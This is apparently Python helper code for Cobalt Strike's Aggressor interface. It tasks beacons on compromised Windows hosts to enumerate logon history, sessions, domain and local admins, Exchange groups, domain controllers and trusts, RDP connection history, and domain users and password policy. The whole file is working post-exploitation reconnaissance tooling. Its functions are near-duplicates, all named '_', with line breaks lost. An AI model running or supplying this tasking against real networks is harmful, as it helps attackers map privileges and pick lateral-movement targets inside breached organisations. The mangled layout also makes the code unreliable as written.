def _(bid): import_host_recon(bid) aggressor.bnet(bid, 'logons') aggressor.bnet(bid, 'sessions') command = helpers.code_string(r""" Write-Output "---------- Explicit logons, past 10 days ----------" Get-ExplicitLogons 10 Write-Output "`n---------- Logons, past 100 events ----------" Get-Logons 100 """) aggressor.btask(bid, 'Tasked beacon to get historical logon information') aggressor.bpowerpick(bid, command, silent=True)
def _(bid): command = textwrap.dedent(r""" echo "--- Domain ---" echo "$env:logonserver" echo "--- Domain admins ---" net group "domain admins" /domain echo "--- Local admins ---" net localgroup administrators echo "--- Exchange ---" net group "Exchange Trusted Subsystem" /domain 2>$null echo "--- Domain trusts ---" """) aggressor.bpowerpick(bid, command) aggressor.bnet(bid, 'dclist') aggressor.bnet(bid, 'domain_trusts')
def _(bid): command = textwrap.dedent(r""" echo "--- Domain ---" echo "$env:logonserver" echo "--- Domain admins ---" net group "domain admins" /domain echo "--- Local admins ---" net localgroup administrators echo "--- Exchange ---" net group "Exchange Trusted Subsystem" /domain 2>$null """) aggressor.btask(bid, 'Tasked beacon to perform basic domain recon') aggressor.bpowerpick(bid, command, silent=True) aggressor.bnet(bid, 'dclist') aggressor.bnet(bid, 'domain_trusts')
def _(bid): command = textwrap.dedent(""" echo "--- Host ---" systeminfo echo "--- User ---" whoami /all echo "Domain: $env:logonserver" echo "Home: $env:userprofile" echo "--- Other ---" reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>$null echo "--- Location ---" pwd """) aggressor.bps(bid) aggressor.bnet(bid, 'logons') aggressor.bnet(bid, 'sessions') aggressor.bpowerpick(bid, command)
def _(bid): aggressor.bnet(bid, 'computers') aggressor.bnet(bid, 'view') aggressor.bnet(bid, 'user') aggressor.bnet(bid, 'group') command = textwrap.dedent(""" echo "--- Domain ---" echo $env:logonserver echo "--- Domain users ---" net user /domain echo "--- Domain groups ---" net groups /domain echo "--- Domain accounts ---" net accounts /domain """) aggressor.bpowerpick(bid, command)
def _(bid): aggressor.bnet(bid, 'computers') aggressor.bnet(bid, 'view') aggressor.bnet(bid, 'user') aggressor.bnet(bid, 'group') command = textwrap.dedent(""" echo "--- Domain ---" echo $env:logonserver echo "--- Domain users ---" net user /domain echo "--- Domain groups ---" net groups /domain echo "--- Domain accounts ---" net accounts /domain """) aggressor.btask(bid, 'Tasked beacon to enumerate domain info') aggressor.bpowerpick(bid, command, silent=True)